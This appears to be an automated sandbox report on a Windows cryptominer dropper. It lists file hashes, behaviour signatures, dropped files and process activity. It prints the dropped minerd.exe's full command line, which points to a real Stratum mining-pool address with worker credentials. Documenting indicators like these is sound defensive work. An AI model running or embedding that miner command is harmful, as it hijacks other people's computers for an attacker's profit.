f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a

Analysis

max time kernel
139s
max time network
148s
platform
windows7_x64
resource
win7-20220414-en
submitted
21-05-2022 00:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe
Size

982KB
MD5

504b942b2155be474f4c649f14b01b2a
SHA1

de56b9060343204ce66d66934e65c1b8afb97fcd
SHA256

f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a
SHA512

cf618d58cfbf647e4d256e402aaaa452f3ee9140fbd6613d1bebe064e5ae661cc2eaf5c2faf04acf2a68900610ca6ff82051f5b42f75ac6d5b364d0252013931

Score

9^/10

miner

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Executes dropped EXE 1 IoCs

Processes:

minerd.exe

pid process

912 minerd.exe

pid	process
912	minerd.exe

Loads dropped DLL 5 IoCs

Processes:

f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exeminerd.exe

pid	process
1660	f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe
1660	f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe
912	minerd.exe
912	minerd.exe
912	minerd.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe

description	pid	process	target process
PID 1660 wrote to memory of 912	1660	f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe	minerd.exe
PID 1660 wrote to memory of 912	1660	f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe	minerd.exe
PID 1660 wrote to memory of 912	1660	f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe	minerd.exe
PID 1660 wrote to memory of 912	1660	f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe	minerd.exe

C:\Users\Admin\AppData\Local\Temp\f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe
"C:\Users\Admin\AppData\Local\Temp\f4673230c670e9d06fda094c57a6bdb475e4ce9c564d0274abfbf6de4e11820a.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1660

C:\Users\Admin\AppData\Local\Temp\Miner\minerd.exe
-a scrypt:1048576 -o stratum+tcp://95.217.0.105:3334 -u hi.a:user -p pa -t 1
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:912

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Miner\libcurl-4.dll
Filesize
392KB

MD5
5b7ac25acd989d7b8a34356c9756baae

SHA1
e0730d0ef6d407beb3793919bfa5bff9fc2161b8

SHA256
647c3b3ee1831bd4ff7352420998252ff829c1ec6422df424b0a5b94a9b0f2ab

SHA512
1fc2d1ceedad6ea7176f9135595afbe78d2279e84f48f3589517a279e1222c2e50e067a11e9dee41495660fa7fb76c9bf0b2a712902a0d369e52cc44f8cd5185

Download Submit
C:\Users\Admin\AppData\Local\Temp\Miner\libwinpthread-1.dll
Filesize
237KB

MD5
033b8b7a02840c53f11b116f829f5ee8

SHA1
fba2470808b23fca7c25e18b948a8fc241116cfe

SHA256
b9a5f5e2b12a102259f1564610e120a719afdc6b21577ddefb76fec0d6dfec0f

SHA512
d2d0c2fa1c9f95420cb508d2370c29e743c8b2b41164b8389acd59c138cd3b9a3f360e8efea2a4fa635eaceb6ae7a54911ecb265cf808e47fb4716dfd6f5cdc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Miner\minerd.exe
Filesize
194KB

MD5
d299dfef00859284869c183540f8e381

SHA1
ca922c47486e0c0b568609a3ea5d62c7eafbf51d

SHA256
bca59846ab83bc5bf5d9b956a8a4c2ec1f7525ca1bc2211d43bf8732158434fd

SHA512
d996e5c9dae440ec9773c43d6673c70045106e4faab05962f2a090b6ba518ab4e04aa4b2ee1c4b60e88e9f7a1ff3c5fd8f9ca09f424248b6d967b21295c0ae3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Miner\zlib1.dll
Filesize
110KB

MD5
af80fcb8f710f36157cbcb9385ba241c

SHA1
b9aa9f2a839310d80d3616786bc52365d1564828

SHA256
4a7dbfc031b1d84d153b418175c366b47c91be0c587389c23e10a4b93fd7b9d6

SHA512
902da40aed9aaa1c71ea001f624a83d7258c8c4ab4eba9eaba5ca5f6fadad9f39e9814671d6bcea17f16079485dcd448668f497127261d85499c7b1bbc734ebc

Download Submit
\Users\Admin\AppData\Local\Temp\Miner\libcurl-4.dll
Filesize
392KB

MD5
5b7ac25acd989d7b8a34356c9756baae

SHA1
e0730d0ef6d407beb3793919bfa5bff9fc2161b8

SHA256
647c3b3ee1831bd4ff7352420998252ff829c1ec6422df424b0a5b94a9b0f2ab

SHA512
1fc2d1ceedad6ea7176f9135595afbe78d2279e84f48f3589517a279e1222c2e50e067a11e9dee41495660fa7fb76c9bf0b2a712902a0d369e52cc44f8cd5185

Download Submit
\Users\Admin\AppData\Local\Temp\Miner\libwinpthread-1.dll
Filesize
237KB

MD5
033b8b7a02840c53f11b116f829f5ee8

SHA1
fba2470808b23fca7c25e18b948a8fc241116cfe

SHA256
b9a5f5e2b12a102259f1564610e120a719afdc6b21577ddefb76fec0d6dfec0f

SHA512
d2d0c2fa1c9f95420cb508d2370c29e743c8b2b41164b8389acd59c138cd3b9a3f360e8efea2a4fa635eaceb6ae7a54911ecb265cf808e47fb4716dfd6f5cdc7

Download Submit
\Users\Admin\AppData\Local\Temp\Miner\minerd.exe
Filesize
194KB

MD5
d299dfef00859284869c183540f8e381

SHA1
ca922c47486e0c0b568609a3ea5d62c7eafbf51d

SHA256
bca59846ab83bc5bf5d9b956a8a4c2ec1f7525ca1bc2211d43bf8732158434fd

SHA512
d996e5c9dae440ec9773c43d6673c70045106e4faab05962f2a090b6ba518ab4e04aa4b2ee1c4b60e88e9f7a1ff3c5fd8f9ca09f424248b6d967b21295c0ae3a

Download Submit
\Users\Admin\AppData\Local\Temp\Miner\minerd.exe
Filesize
194KB

MD5
d299dfef00859284869c183540f8e381

SHA1
ca922c47486e0c0b568609a3ea5d62c7eafbf51d

SHA256
bca59846ab83bc5bf5d9b956a8a4c2ec1f7525ca1bc2211d43bf8732158434fd

SHA512
d996e5c9dae440ec9773c43d6673c70045106e4faab05962f2a090b6ba518ab4e04aa4b2ee1c4b60e88e9f7a1ff3c5fd8f9ca09f424248b6d967b21295c0ae3a

Download Submit
\Users\Admin\AppData\Local\Temp\Miner\zlib1.dll
Filesize
110KB

MD5
af80fcb8f710f36157cbcb9385ba241c

SHA1
b9aa9f2a839310d80d3616786bc52365d1564828

SHA256
4a7dbfc031b1d84d153b418175c366b47c91be0c587389c23e10a4b93fd7b9d6

SHA512
902da40aed9aaa1c71ea001f624a83d7258c8c4ab4eba9eaba5ca5f6fadad9f39e9814671d6bcea17f16079485dcd448668f497127261d85499c7b1bbc734ebc

Download Submit
memory/912-56-0x0000000000000000-mapping.dmp

Download
memory/912-65-0x0000000070800000-0x0000000070859000-memory.dmp

Filesize
356KB

Download
memory/912-64-0x0000000062E80000-0x0000000062EA3000-memory.dmp

Filesize
140KB

Download